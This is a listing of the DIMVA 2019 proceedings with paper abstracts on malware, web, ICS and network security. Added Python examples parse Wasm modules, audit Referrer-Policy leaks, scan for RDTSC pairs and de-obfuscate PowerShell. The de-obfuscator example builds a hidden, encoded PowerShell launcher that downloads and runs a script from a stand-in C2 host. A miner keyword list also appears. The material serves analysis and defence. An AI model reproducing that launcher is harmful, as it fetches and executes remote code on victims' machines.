
2019 | Book

Detection of Intrusions and Malware, and Vulnerability Assessment

16th International Conference, DIMVA 2019, Gothenburg, Sweden, June 19–20, 2019, Proceedings

Edited by: Roberto Perdisci, Clémentine Maurice, Giorgio Giacinto, Dr. Magnus Almgren

Publisher: Springer International Publishing

Book series: Lecture Notes in Computer Science


About this book

This book constitutes the proceedings of the 16th International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment, DIMVA 2019, held in Gothenburg, Sweden, in June 2019.
The 23 full papers presented in this volume were carefully reviewed and selected from 80 submissions. The contributions were organized in topical sections named: wild wild web; cyber-physical systems; malware; software security and binary analysis; network security; and attack mitigation.

Table of contents

Frontmatter

Wild Wild Web

Wild Extensions: Discovering and Analyzing Unlisted Chrome Extensions
Abstract
With browsers being a ubiquitous, if not required, method to access the web, they represent a unique and universal threat vector. Browsers can run third-party extensions virtually invisibly in the background after a quick install. In this paper, we explore the abuse of browser extensions that achieve installations via suspicious methods. We scan the web for links to extension installations by performing a web crawling of the Alexa top 10,000 websites with recursive sub-page depth of 4 and leverage other tools to search for artifacts in the source code of webpages. We discover pages that have links to both listed and unlisted extensions, many times pointing to multiple different extensions that share the same name. Using this data, we were able to find 1,097 unlisted browser extensions ranging from internal directory lookup tools to hidden Google Docs extensions that pose a serious threat to their 127 million users.
Aidan Beggs, Alexandros Kapravelos
New Kid on the Web: A Study on the Prevalence of WebAssembly in the Wild
Abstract
WebAssembly, or Wasm for short, is a new, low-level language that allows for near-native execution performance and is supported by all major browsers as of today. In comparison to JavaScript it offers faster transmission, parsing, and execution times. Up until now it has, however, been largely unclear what WebAssembly is used for in the wild. In this paper, we thus conduct the first large-scale study on the Web. For this, we examine the prevalence of WebAssembly in the Alexa Top 1 million websites and find that as many as 1 out of 600 sites execute Wasm code. Moreover, we perform several secondary analyses, including an evaluation of code characteristics and the assessment of a Wasm module’s field of application. Based on this, we find that over 50 % of all sites using WebAssembly apply it for malicious deeds, such as mining and obfuscation.
Marius Musch, Christian Wressnegger, Martin Johns, Konrad Rieck
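A first step in any such study is recognising and fingerprinting the Wasm modules a crawler collects. The following added example (not the authors' code) parses the binary format's section headers and extracts import and export names, which is often enough to tell an image codec from a miner by name alone. The sample module built by the helpers, its `env.mem` import, the export name `cryptonight_hash` and the keyword list in `looks_like_miner` are constructed assumptions for this illustration.

```python
import re


def _leb(n):
    """Unsigned LEB128, used for every size and index in the Wasm binary format."""
    out = bytearray()
    while True:
        byte = n & 0x7F
        n >>= 7
        if n:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def _section(sid, payload):
    return bytes([sid]) + _leb(len(payload)) + payload


def _name(s):
    b = s.encode()
    return _leb(len(b)) + b


# Constructed sample (assumption): a minimal valid module that imports a memory
# from "env" and exports one function whose name mimics a CryptoNight miner.
SAMPLE_MODULE = (
    b"\x00asm" + b"\x01\x00\x00\x00"
    + _section(1, b"\x01" + b"\x60\x00\x00")                                 # type: one () -> ()
    + _section(2, b"\x01" + _name("env") + _name("mem") + b"\x02\x00\x01")   # import memory, min 1 page
    + _section(3, b"\x01\x00")                                              # one function of type 0
    + _section(7, b"\x01" + _name("cryptonight_hash") + b"\x00\x00")        # export func index 0
    + _section(10, b"\x01" + b"\x02\x00\x0b")                               # body: no locals, end
)


def _read_leb(data, pos):
    result, shift = 0, 0
    while True:
        byte = data[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            return result, pos


def _read_name(data, pos):
    n, pos = _read_leb(data, pos)
    return data[pos:pos + n].decode(), pos + n


def _skip_limits(data, pos):
    flag = data[pos]
    pos += 1
    _, pos = _read_leb(data, pos)          # min
    if flag & 1:
        _, pos = _read_leb(data, pos)      # max
    return pos


KINDS = {0: "func", 1: "table", 2: "memory", 3: "global"}


def parse_module(data):
    """Walk the section list; decode import (id 2) and export (id 7) sections."""
    if data[:4] != b"\x00asm":
        raise ValueError("not a WebAssembly module")
    mod = {"version": int.from_bytes(data[4:8], "little"), "sections": [], "imports": [], "exports": []}
    pos = 8
    while pos < len(data):
        sid = data[pos]
        pos += 1
        size, pos = _read_leb(data, pos)
        body, end = data[pos:pos + size], pos + size
        mod["sections"].append((sid, size))
        if sid == 2:
            count, p = _read_leb(body, 0)
            for _ in range(count):
                module, p = _read_name(body, p)
                field, p = _read_name(body, p)
                kind = body[p]
                p += 1
                if kind == 0:
                    _, p = _read_leb(body, p)            # typeidx
                elif kind == 1:
                    p = _skip_limits(body, p + 1)        # elemtype byte, then limits
                elif kind == 2:
                    p = _skip_limits(body, p)
                elif kind == 3:
                    p += 2                               # valtype + mutability
                mod["imports"].append((module, field, KINDS[kind]))
        elif sid == 7:
            count, p = _read_leb(body, 0)
            for _ in range(count):
                name, p = _read_name(body, p)
                kind = body[p]
                p += 1
                idx, p = _read_leb(body, p)
                mod["exports"].append((name, KINDS[kind], idx))
        pos = end
    return mod


# Heuristic keyword list (assumption, not the paper's classifier).
MINER_HINTS = re.compile(r"cryptonight|cn_slow_hash|hashrate|stratum", re.I)


def looks_like_miner(mod):
    names = [n for n, _, _ in mod["exports"]] + [f for _, f, _ in mod["imports"]]
    return any(MINER_HINTS.search(n) for n in names)
```

Export and import names survive even when the module is otherwise stripped, so a name-based first pass is cheap; obfuscated or renamed modules need the code-characteristic analysis the paper describes on top of it.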
Morellian Analysis for Browsers: Making Web Authentication Stronger with Canvas Fingerprinting
Abstract
In this paper, we present the first fingerprinting-based authentication scheme that is not vulnerable to trivial replay attacks. Our proposed canvas-based fingerprinting technique utilizes one key characteristic: it is parameterized by a challenge, generated on the server side. We perform an in-depth analysis of all parameters that can be used to generate canvas challenges, and we show that it is possible to generate unique, unpredictable, and highly diverse canvas-generated images each time a user logs onto a service. With the analysis of images collected from more than 1.1 million devices in a real-world large-scale experiment, we evaluate our proposed scheme against a large set of attack scenarios and conclude that canvas fingerprinting is a suitable mechanism for stronger authentication on the web.
Pierre Laperdrix, Gildas Avoine, Benoit Baudry, Nick Nikiforakis
On the Perils of Leaking Referrers in Online Collaboration Services
Abstract
Online collaboration services (OCS) are appealing since they provide ease of access to resources and the ability to collaborate on shared files. Documents on these services are frequently shared via secret links, which allows easy collaboration between different users. The security of this secret link approach relies on the fact that only those who know the location of the secret resource (i.e., its URL) can access it. In this paper, we show that the secret location of OCS files can be leaked by the improper handling of links embedded in these files. Specifically, if a user clicks on a link embedded into a file hosted on an OCS, the HTTP Referer contained in the resulting HTTP request might leak the secret URL. We present a study of 21 online collaboration services and show that seven of them are vulnerable to this kind of secret information disclosure caused by the improper handling of embedded links and HTTP Referers. We identify two root causes of these issues, both having to do with an incorrect application of the Referrer Policy, a countermeasure designed to restrict how HTTP Referers are shared with third parties. In the first case, six services leak their referrers because they do not implement a strict enough and up-to-date policy. In the second case, one service correctly implements an appropriate Referrer Policy, but some web browsers do not obey it, causing links clicked through them to leak their HTTP Referers. To fix this problem, we discuss how services can apply the Referrer Policy correctly to avoid these incidents, as well as other server and client side countermeasures.
Beliz Kaleli, Manuel Egele, Gianluca Stringhini
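To see where the first root cause comes from, it helps to work through what each policy value actually emits. The following added example (not the authors' code) models the browser's "determine request's referrer" step for every Referrer-Policy value and checks which ones expose the secret path of a document URL to a third party. The document URL, the third-party host and the simplification of "downgrade" to an https-to-http transition are assumptions made for this illustration.

```python
from urllib.parse import urlsplit, urlunsplit

POLICIES = {"no-referrer", "no-referrer-when-downgrade", "origin", "origin-when-cross-origin",
            "same-origin", "strict-origin", "strict-origin-when-cross-origin", "unsafe-url"}


def _origin(url):
    p = urlsplit(url)
    return f"{p.scheme}://{p.hostname}" + (f":{p.port}" if p.port else "")


def _full(url):
    """'Full URL' cases still strip credentials and the fragment."""
    p = urlsplit(url)
    host = p.hostname + (f":{p.port}" if p.port else "")
    return urlunsplit((p.scheme, host, p.path, p.query, ""))


def referrer_for(policy, source, dest):
    """Referer value sent when a link on `source` is followed to `dest`.
    Assumption: 'downgrade' is simplified to https -> http."""
    if policy == "":
        policy = "strict-origin-when-cross-origin"   # assumption: current browser default
    if policy not in POLICIES:
        raise ValueError(f"unknown policy {policy!r}")
    same_origin = _origin(source) == _origin(dest)
    downgrade = urlsplit(source).scheme == "https" and urlsplit(dest).scheme == "http"
    origin = _origin(source) + "/"
    full = _full(source)
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full
    if policy == "origin":
        return origin
    if policy == "same-origin":
        return full if same_origin else None
    if policy == "strict-origin":
        return None if downgrade else origin
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full
    if policy == "origin-when-cross-origin":
        return full if same_origin else origin
    # strict-origin-when-cross-origin
    if same_origin:
        return full
    return None if downgrade else origin


def leaks_secret_path(policy, secret_url, dest):
    """True when the Referer carries the secret path component of the document URL."""
    ref = referrer_for(policy, secret_url, dest)
    return ref is not None and urlsplit(ref).path == urlsplit(secret_url).path


# Constructed secret-link document URL (assumption).
SECRET_DOC = "https://docs.example.com/d/8f3a1c2e/edit#gid=0"


def audit(secret_url, third_party="https://attacker.example/"):
    """Which policies leak the secret path to an HTTPS third-party link target."""
    return {p: leaks_secret_path(p, secret_url, third_party) for p in sorted(POLICIES)}
```

The audit shows that `no-referrer-when-downgrade` still sends the full URL to any HTTPS third party, which is exactly the "not strict enough" failure; only `no-referrer` removes the header outright. Against a browser that ignores the policy, the server-side fallback is to route outbound links through a redirector page whose own URL carries nothing secret, so whatever Referer the browser emits is harmless.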

Cyber-Physical Systems

Detecting, Fingerprinting and Tracking Reconnaissance Campaigns Targeting Industrial Control Systems
Abstract
Industrial Control Systems (ICS) are attractive targets to attackers because of the significant cyber-physical damage they can inflict. As such, they are often subjected to reconnaissance campaigns aiming at discovering vulnerabilities that can be exploited online. As these campaigns scan large netblocks of the Internet, some of the IP packets are directed to the darknet (routable, allocated but unused IP space). In this paper, we propose a new technique to detect, fingerprint, and track probing campaigns targeting ICS systems by leveraging traffic from a /13 darknet. Our proposed technique automatically, and in near real time, detects such ICS probing campaigns and generates relevant and timely cyber threat intelligence, using graph-theoretic methods to compare and aggregate packets into campaigns. In addition, it ascribes to each observed campaign a fingerprint that uniquely characterizes it and allows its tracking over time. Our technique has been tested over 12.85 TB of data, representing 330 days of received darknet network traffic. The result of our analysis allows for the discovery not only of known legitimate recurrent probing campaigns, such as those performed by Shodan and Censys, but also of coordinated campaigns launched by other organizations. Furthermore, we give details on a campaign linked to botnet activity targeting the EtherNet/IP protocol.
Olivier Cabana, Amr M. Youssef, Mourad Debbabi, Bernard Lebel, Marthe Kassouf, Basile L. Agba
Overshadow PLC to Detect Remote Control-Logic Injection Attacks
Abstract
Programmable logic controllers (PLCs) in industrial control systems (ICS) are vulnerable to remote control-logic injection attacks. Attackers target the control logic of a PLC to manipulate the behavior of a physical process such as a nuclear plant, power grid, or gas pipeline. Control logic attacks have been studied extensively in the literature, including hiding the transfer of control logic over the network from both packet-header-based signatures and deep packet inspection. For instance, these attacks transfer control logic code as data, in small fragments (one byte per packet) that are further padded with noise data. To detect control logic in ICS network traffic, this paper presents Shade, a novel shadow memory technique that observes the network traffic to maintain a local copy of the current state of a PLC's memory. To analyze the memory contents, Shade employs a classification algorithm with 42 unique features categorized into five types at different semantic levels of control logic code, such as the number of rungs, the number of consecutive decompiled instructions, and n-grams. We then evaluate Shade against control logic injection attacks on two PLCs, Modicon M221 and MicroLogix 1400, from two ICS vendors, Schneider Electric and Allen-Bradley, respectively. The evaluation results show that Shade can detect an attack instance (i.e., identify at least one attack packet during the transfer of a malicious control logic) accurately and without any false alarms.
Hyunguk Yoo, Sushma Kalle, Jared Smith, Irfan Ahmed
A Security Evaluation of Industrial Radio Remote Controllers
Abstract
Heavy industrial machinery is a primary asset for the operation of key sectors such as construction, manufacturing, and logistics. Targeted attacks against these assets could result in incidents, fatal injuries, and substantial financial loss. Given the importance of such scenarios, we analyzed and evaluated the security implications of the technology used to operate and control this machinery, namely industrial radio remote controllers. We conducted the first-ever security analysis of this technology, which relies on proprietary radio-frequency protocols to implement remote-control functionalities. Through a two-phase evaluation approach we discovered important flaws in the design and implementation of industrial remote controllers. In this paper we introduce and describe 5 practical attacks affecting major vendors and multiple real-world installations. We conclude by discussing how a challenging responsible disclosure process resulted in first-ever security patches and improved security awareness.
Federico Maggi, Marco Balduzzi, Jonathan Andersson, Philippe Lin, Stephen Hilt, Akira Urano, Rainer Vosseler
Understanding the Security of Traffic Signal Infrastructure
Abstract
With the proliferation of using smart and connected devices in the transportation domain, these systems inevitably face security threats from the real world. In this work, we analyze the security of the existing traffic signal systems and summarize the security implications exposed in our analysis. Our research shows that the deployed traffic signal systems can be easily manipulated with physical/remote access and are vulnerable to an array of real-world attacks such as a diversionary tactic. By setting up a standard traffic signal system locally in our lab and partnering with a municipality, we demonstrate that not only can traffic intersections be manipulated to show deadly traffic patterns such as all-direction green lights, but traffic control systems are also susceptible to ransomware and disruption attacks. Through testing and studying these attacks, we provide our security recommendations and mitigations to these threats.
Zhenyu Ning, Fengwei Zhang, Stephen Remias

Malware

Practical Enclave Malware with Intel SGX
Abstract
Modern CPU architectures offer strong isolation guarantees towards user applications in the form of enclaves. However, Intel's threat model for SGX assumes fully trusted enclaves, and there is doubt about how realistic this is. In particular, it is unclear to what extent enclave malware could harm a system. In this work, we practically demonstrate the first enclave malware which fully and stealthily impersonates its host application. Together with poorly-deployed application isolation on personal computers, such malware can not only steal or encrypt documents for extortion but also act on the user's behalf, e.g., send phishing emails or mount denial-of-service attacks. Our SGX-ROP attack uses a new TSX-based memory-disclosure primitive and a write-anything-anywhere primitive to construct a code-reuse attack from within an enclave, which is then inadvertently executed by the host application. With SGX-ROP, we bypass ASLR, stack canaries, and address sanitizer. We demonstrate that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits. With our results, we demystify the enclave malware threat and lay ground for future research on defenses against enclave malware.
Michael Schwarz, Samuel Weiser, Daniel Gruss
How Does Malware Use RDTSC? A Study on Operations Executed by Malware with CPU Cycle Measurement
Abstract
Many malware programs execute operations for analysis evasion. They include sandbox detection through measurement of execution time or executed CPU cycles with a method that exploits the RDTSC instruction. Although the detection technique is widely known and well-studied, the actual usage of the RDTSC instruction by real malware has not yet been sufficiently clarified. In this paper, we present analysis results for RDTSC usage collected from more than 200,000 malware files. In this analysis, malware programs are searched for closely placed pairs of RDTSCs; then, code fragments surrounding these pairs are extracted. A system developed by the authors classifies the extracted code fragments into distinct groups based on their characteristics, according to a set of rules that matches the fragments with instruction patterns. The results indicate that malware programs measure the number of CPU cycles of diverse operations and can also execute the RDTSC instruction for other purposes, such as obfuscation and acquisition of random values.
Yoshihiro Oyama
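The first step of the analysis described above is locating closely placed RDTSC pairs in a sample. The added example below (not the author's tool) does that at the byte level: it scans for the `0F 31` opcode, pairs occurrences that fall within a window, and tags fragments that contain CPUID or RDTSCP between the two reads, which is the classic serialized-timing sandbox check. The window size, the category names and the sample byte string are constructed assumptions, and because the scan does not disassemble, a `0F 31` inside data or inside a longer instruction yields a false hit that a real implementation filters by disassembling first.

```python
import re

RDTSC = b"\x0f\x31"       # rdtsc
RDTSCP = b"\x0f\x01\xf9"  # rdtscp
CPUID = b"\x0f\xa2"       # cpuid: serializing, so rdtsc;cpuid;rdtsc measures a VM exit cost


def find_rdtsc(code):
    """Byte offsets of every rdtsc opcode (no disassembly; see caveat in the text)."""
    return [m.start() for m in re.finditer(re.escape(RDTSC), code)]


def rdtsc_pairs(code, window=64):
    """Consecutive rdtsc occurrences no more than `window` bytes apart (assumed window)."""
    offs = find_rdtsc(code)
    return [(a, b) for a, b in zip(offs, offs[1:]) if b - a <= window]


def classify_fragment(code, pair):
    """Tag the bytes between the two reads by the timed operation they enclose."""
    a, b = pair
    between = code[a + 2:b]
    if CPUID in between:
        return "cpuid-timing"
    if RDTSCP in between:
        return "rdtscp-timing"
    return "other"


def scan(code, window=64):
    return [(a, b, classify_fragment(code, (a, b))) for a, b in rdtsc_pairs(code, window)]


# Constructed bytes (assumption, not a real sample):
#   rdtsc; mov esi,eax; cpuid; rdtsc; sub eax,esi
# followed by an isolated rdtsc and another one 100 bytes later, outside the window.
SAMPLE = (b"\x90" * 8
          + b"\x0f\x31\x89\xc6\x0f\xa2\x0f\x31\x29\xf0"
          + b"\x90" * 8 + b"\x0f\x31" + b"\xcc" * 100 + b"\x0f\x31")
```

On the sample, the first pair is tagged as CPUID timing and the second as "other"; the lone RDTSC 100 bytes further on is dropped by the window, which is what the paper's "closely placed" criterion is for.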
On Deception-Based Protection Against Cryptographic Ransomware
Abstract
In order to detect malicious file system activity, some commercial and academic anti-ransomware solutions implement deception-based techniques, specifically by placing decoy files among user files. While this approach raises the bar against current ransomware, as any access to a decoy file is a sign of malicious activity, the robustness of decoy strategies has not been formally analyzed and fully tested. In this paper, we analyze existing decoy strategies and discuss how they are effective in countering current ransomware by defining a set of metrics to measure their robustness. To demonstrate how ransomware can identify existing deception-based detection strategies, we have implemented a proof-of-concept anti-decoy ransomware that successfully bypasses decoys by using a decision engine with few rules. Finally, we discuss existing issues in decoy-based strategies and propose practical solutions to mitigate them.
Ziya Alper Genç, Gabriele Lenzini, Daniele Sgandurra
PowerDrive: Accurate De-obfuscation and Analysis of PowerShell Malware
Abstract
PowerShell is nowadays a widely-used technology to administrate and manage Windows-based operating systems. However, it is also extensively used by malware vectors to execute payloads or drop additional malicious contents. Similarly to other scripting languages used by malware, PowerShell attacks are challenging to analyze due to the extensive use of multiple obfuscation layers, which make the real malicious code hard to unveil. To the best of our knowledge, a comprehensive solution for properly de-obfuscating such attacks is currently missing. In this paper, we present PowerDrive, an open-source, static and dynamic multi-stage de-obfuscator for PowerShell attacks. PowerDrive instruments the PowerShell code to progressively de-obfuscate it by showing the analyst the employed obfuscation steps. We used PowerDrive to successfully analyze thousands of PowerShell attacks extracted from various malware vectors and executables. The attained results show interesting patterns used by attackers to devise their malicious scripts. Moreover, we provide a taxonomy of behavioral models adopted by the analyzed codes and a comprehensive list of the malicious domains contacted during the analysis.
Denis Ugarte, Davide Maiorca, Fabrizio Cara, Giorgio Giacinto
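To make the multi-stage idea concrete, the added example below (not PowerDrive itself, and purely static where PowerDrive also runs the code) peels three common PowerShell obfuscation layers in order and records each step the way the abstract describes for the analyst: a base64/UTF-16LE `-EncodedCommand`, an `IEX (-join ('...'[-1..-N]))` reversed-string wrapper, and `[char]N+[char]M` concatenation. The sample launcher line, the two helpers that build it and the download URL on the reserved `.example` TLD are constructed for this illustration.

```python
import base64
import re

# Constructed sample (assumption): the stage-2 URL and the launcher built below.
URL = "http://c2.example/stage2.ps1"


def _char_concat(s):
    # 'ab' -> [char]97+[char]98 ; PowerShell concatenates chars into a string
    return "+".join(f"[char]{ord(c)}" for c in s)


def _reverse_join(s):
    # PowerShell idiom: -join ('cba'[-1..-3]) evaluates to 'abc'
    return f"-join ('{s[::-1]}'[-1..-{len(s)}])"


INNER = f"IEX (New-Object Net.WebClient).DownloadString({_char_concat(URL)})"
SCRIPT = f"IEX ({_reverse_join(INNER)})"
SAMPLE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(SCRIPT.encode("utf-16-le")).decode()

ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]+)", re.I)
CHARS_RE = re.compile(r"(?:\[char\]\d+\s*\+\s*)*\[char\]\d+", re.I)
REV_RE = re.compile(r"IEX\s*\(\s*-join\s*\(\s*'([^']*)'\[-1\.\.-(\d+)\]\s*\)\s*\)", re.I)


def decode_encoded_command(text):
    """Layer 1: -EncodedCommand carries the script as base64 of UTF-16LE."""
    m = ENC_RE.search(text)
    if not m:
        return text
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def unwrap_reverse_join(text):
    """Layer 2: IEX(-join ('...'[-1..-N])) executes the reversed literal; emit that code."""
    def unwrap(m):
        lit, n = m.group(1), int(m.group(2))
        return lit[::-1] if n == len(lit) else m.group(0)
    return REV_RE.sub(unwrap, text)


def resolve_char_concat(text):
    """Layer 3: fold [char]N+[char]M+... into a quoted string literal."""
    def fold(m):
        s = "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", m.group(0), re.I))
        return "'" + s.replace("'", "''") + "'"
    return CHARS_RE.sub(fold, text)


PASSES = [("encoded-command", decode_encoded_command),
          ("iex-reverse-join", unwrap_reverse_join),
          ("char-concat", resolve_char_concat)]


def deobfuscate(text, max_rounds=10):
    """Apply the passes until a fixed point; return the final code and the layers peeled, in order."""
    steps = []
    for _ in range(max_rounds):
        changed = False
        for name, fn in PASSES:
            new = fn(text)
            if new != text:
                steps.append((name, new))
                text, changed = new, True
        if not changed:
            break
    return text, steps
```

The recorded `steps` list is the analyst-facing trail: each entry names the obfuscation technique removed and shows the intermediate script, so the contacted domain surfaces only after the last layer.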

Software Security and Binary Analysis

Memory Categorization: Separating Attacker-Controlled Data
Abstract
Memory corruption attacks against software written in C or C++ are still prevalent and remain a significant cause of security breaches. Defenses providing full memory safety remain expensive, and leaner defenses only addressing control-flow data are insufficient.
We introduce memory categorization, an approach to separate data based on attacker control to mitigate the exploitation of memory corruption vulnerabilities such as use-after-free and use-after-return. MemCat implements this approach by: (i) providing separate memory allocators for different data categories, (ii) categorizing the use of memory allocations, (iii) changing allocations to take advantage of the categorization.
We demonstrate the effectiveness of MemCat in a case study on actual vulnerabilities in real-world programs. We further show that, although our prototype implementation causes a high overhead in two edge cases, in most cases the performance hit remains negligible, with a median overhead of less than 3% on the SPEC benchmark suite.
Matthias Neugschwandtner, Alessandro Sorniotti, Anil Kurmus
TypeMiner: Recovering Types in Binary Programs Using Machine Learning
Abstract
Closed-source software is a major hurdle for assessing the security of computer systems. In absence of source code, it is particularly difficult to locate vulnerabilities and malicious functionality, as crucial information is removed by the compilation process. Most notably, binary programs usually lack type information, which complicates spotting vulnerabilities such as integer flaws or type confusions dramatically. Moreover, data types are often essential for gaining a deeper understanding of the program logic. In this paper we present TypeMiner, a static method for recovering types in binary programs. We build on the assumption that types leave characteristic traits in compiled code that can be automatically identified using machine learning starting at usage locations determined by an analyst. We evaluate the performance of our method with 14 real world software projects written in C and show that it is able to correctly recover the data types in 76%–93% of the cases.
Alwin Maier, Hugo Gascon, Christian Wressnegger, Konrad Rieck
SAFE: Self-Attentive Function Embeddings for Binary Similarity
Abstract
The binary similarity problem consists of determining whether two functions are similar by considering only their compiled form. Techniques for binary similarity have an immediate practical impact on several fields such as copyright disputes, malware analysis, vulnerability detection, etc. Current solutions compare functions by first transforming their binary code into multi-dimensional vector representations (embeddings), and then comparing vectors through simple and efficient geometric operations. In this paper we propose SAFE, a novel architecture for the embedding of functions based on a self-attentive neural network. SAFE works directly on disassembled binary functions, does not require manual feature extraction, is computationally more efficient than existing solutions, and is more general as it works on stripped binaries and on multiple architectures. We report the results from a quantitative and qualitative analysis that show how SAFE provides a noticeable performance improvement with respect to previous solutions. Furthermore, we show how clusters of our embedding vectors are closely related to the semantics of the implemented algorithms, paving the way for further interesting applications.
Luca Massarelli, Giuseppe Antonio Di Luna, Fabio Petroni, Roberto Baldoni, Leonardo Querzoni
Triggerflow: Regression Testing by Advanced Execution Path Inspection
Abstract
Cryptographic libraries often feature multiple implementations of primitives to meet both the security needs of handling private information and the performance requirements of modern services when the handled information is public. OpenSSL, the de-facto standard free and open source cryptographic library, includes mechanisms to differentiate the confidential data and its control flow, including run-time flags, designed for hardening against timing side-channels, but repeatedly accidentally mishandled in the past. To analyze and prevent these accidents, we introduce Triggerflow, a tool for tracking execution paths that, assisted by source annotations, dynamically analyzes the binary through the debugger. We validate this approach with case studies demonstrating how adopting our method in the development pipeline would have promptly detected such accidents. We further showcase the value of the tooling by presenting two novel discoveries facilitated by Triggerflow: one leak and one defect.
Iaroslav Gridin, Cesar Pereida García, Nicola Tuveri, Billy Bob Brumley

Network Security

Large-Scale Analysis of Infrastructure-Leaking DNS Servers
Abstract
The Domain Name System (DNS) is a fundamental backbone service of the Internet. In practice, this infrastructure often shows flaws, which indicates that measuring the DNS is important to understand potential (security) issues. Several works deal with the DNS and present such problems, mitigations, and attack vectors. A so far overlooked issue is the fact that DNS servers might answer external queries with information about internal networks (e.g., hostnames). This behavior makes active network reconnaissance possible without the need for individual vulnerabilities or exploits. Analyzing how public DNS services might involuntarily disclose sensitive information ties in with the trust we place in Internet services.
To investigate this phenomenon, we conducted a systematic measurement study on this topic. We crawl all publicly reachable DNS servers in 15 scans over a period of almost six months and analyze up to 574,000 DNS servers per run that are configured in a way that might lead to this kind of information leakage. With this large-scale evaluation, we show that such potentially infrastructure-leaking DNS servers make up, on average across all of our scans, almost 4% of all reachable DNS servers on the Internet. Based on our newest scan, the countries with the most such servers are Romania, China, and the US. In these countries, the share of such servers among all reachable servers is about 15% in Romania, 9% in China, and 2.9% in the US. A detailed analysis of the responses reveals that not all answers provide useful information for an adversary. However, we found that up to 158,000 DNS servers provide potentially exploitable information in the wild. Hence, this measurement study demonstrates that a DNS server should be configured carefully; otherwise, it may disclose too much information.
Dennis Tatang, Carl Schneider, Thorsten Holz
Security in Plain TXT
Observing the Use of DNS TXT Records in the Wild
Abstract
The Domain Name System is a critical piece of infrastructure that has expanded into use cases beyond its original intent. DNS TXT records are intentionally very permissive in what information can be stored there, and as a result are often used in broad and undocumented ways to support Internet security and networked applications. In this paper, we identified and categorized the patterns in TXT record use from a representative collection of resource record sets. We obtained the records from a data set containing 1.4 billion TXT records collected over a 2 year period and used pattern matching to identify record use cases present across multiple domains. We found that 92% of these records generally fall into 3 categories: protocol enhancement, domain verification, and resource location. While some of these records are required to remain public, we discovered many examples that unnecessarily reveal domain information or present other security threats (e.g., amplification attacks) in conflict with best practices in security.
Adam Portier, Henry Carter, Charles Lever
No Need to Marry to Change Your Name! Attacking Profinet IO Automation Networks Using DCP
Abstract
Current developments in digitization and industry 4.0 bear new challenges for automation systems. In order to enable interoperability and vertical integration of corporate management systems, these networks have evolved from formerly proprietary solutions to the application of Ethernet-based communication and internet standards. This development is accompanied by an increase in the number of threats. Although the most critical IT protection objective for automation systems is availability, usually no security mechanisms have been integrated into automation protocols. Ethernet also offers no protection by design for these protocols. One of the most popular real-time protocols for industrial applications is Profinet IO. In this paper, we describe a Denial-of-Service attack on Profinet IO that exploits a vulnerability in the Discovery and Basic Configuration Protocol (DCP) which interrupts the Application Relationship between an IO Controller and an IO Device, and thus prevents the system from being repaired by the operator. The attack combines port stealing with the sending of forged DCP packets and causes system downtime, which in affected production networks would probably lead to serious financial damage and, in the case of critical infrastructures, even represents a high risk for the supply of society. We demonstrate the practical feasibility of the attack using realistic hardware and scenarios and discuss its significance for other setups as well.
Stefan Mehner, Hartmut König
DPX: Data-Plane eXtensions for SDN Security Service Instantiation
Abstract
SDN-based NFV technologies improve the dependability and resilience of networks by enabling administrators to spawn and scale-up traffic management and security services in response to dynamic network conditions. However, in practice, SDN-based NFV services often suffer from poor performance and require complex configurations due to the fact that network packets must be ‘detoured’ to each virtualized security service, which expends bandwidth and increases network propagation delay. To address these challenges, we propose a new SDN-based data plane architecture called DPX that natively supports security services as a set of abstract security actions that are then translated to OpenFlow rule sets. The DPX action model reduces redundant processing caused by frequent packet parsing and provides administrators a simplified (and less error-prone) method for configuring security services into the network. DPX also increases the efficiency of enforcing complex security policies by introducing a novel technique called action clustering, which aggregates security actions from multiple flows into a small number of synthetic rules. We present an implementation of DPX in hardware using NetFPGA-SUME and in software using Open vSwitch. We evaluated the performance of the DPX prototype and the efficacy of its flow-table simplifications against a range of complex network policies exposed to line rates of 10 Gbps. We find that DPX imposes minimal overheads in terms of latency (≈0.65 ms in hardware and ≈1.2 ms in software on average) and throughput (≈1% of simple forwarding in hardware and ≈10% in software for non-DPI security services). This translates to an improvement of 30% over traditional NFV services on the software implementation and 40% in hardware.
Taejune Park, Yeonkeun Kim, Vinod Yegneswaran, Phillip Porras, Zhaoyan Xu, KyoungSoo Park, Seungwon Shin

Attack Mitigation

Practical Password Hardening Based on TLS
Abstract
Text-based passwords are still the dominant form of user authentication in remote services. Beyond the many usability issues associated with handling several text-based passwords, security is also an important dimension. Through the years, a significant number of online services have been compromised and their stored passwords have been leaked. Once the database is compromised, it takes little time for a program to crack the cryptographically hashed (weak) passwords, no matter the algorithm used.
In response to this problem, researchers have proposed cryptographic services for hardening all stored passwords. These services perform several sessions of cryptographic hashing combined with message authentication codes. The goal of these services is to coerce adversaries to use them while cracking the passwords. This essentially transforms off-line password cracking to on-line.
Although these services incorporate elaborate cryptographic schemes for password hardening, it is unclear how easily typical web sites can utilize them without outsourcing the functionality to large providers. In this paper, we take a systems approach for making any web site that is serviced through TLS capable of strongly hardening their passwords. We observe that any TLS-enabled web server is already equipped with strong cryptographic functions. We modify mod_ssl, the module that offers TLS to any Apache web server, to act as a password-hardening service. Our evaluation shows that with an overhead similar to adapting hash functions (such as scrypt and bcrypt), our proposal can protect even the weakest passwords, once they are leaked.
Constantinos Diomedous, Elias Athanasopoulos
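The transformation that turns offline cracking into online cracking is easy to state in code. The added example below (not the authors' mod_ssl modification) models the hardening service as an HMAC under a key that only the TLS module holds, with PBKDF2 standing in for scrypt or bcrypt and a call counter standing in for whatever throttling the service applies. The class, the iteration count, the wordlist and the rate limit are assumptions for illustration; the point it demonstrates is that a leaked table of keyed digests cannot be attacked without querying the service.

```python
import hashlib
import hmac
import os
import secrets


class RateLimited(Exception):
    pass


class TlsHardeningService:
    """Stand-in (assumption) for the key-holding TLS module: the key never leaves it,
    so the password table alone does not let an attacker test guesses."""

    def __init__(self, max_calls=None):
        self._key = secrets.token_bytes(32)
        self.calls = 0
        self.max_calls = max_calls

    def harden(self, digest: bytes) -> bytes:
        self.calls += 1
        if self.max_calls is not None and self.calls > self.max_calls:
            raise RateLimited("hardening budget exhausted")
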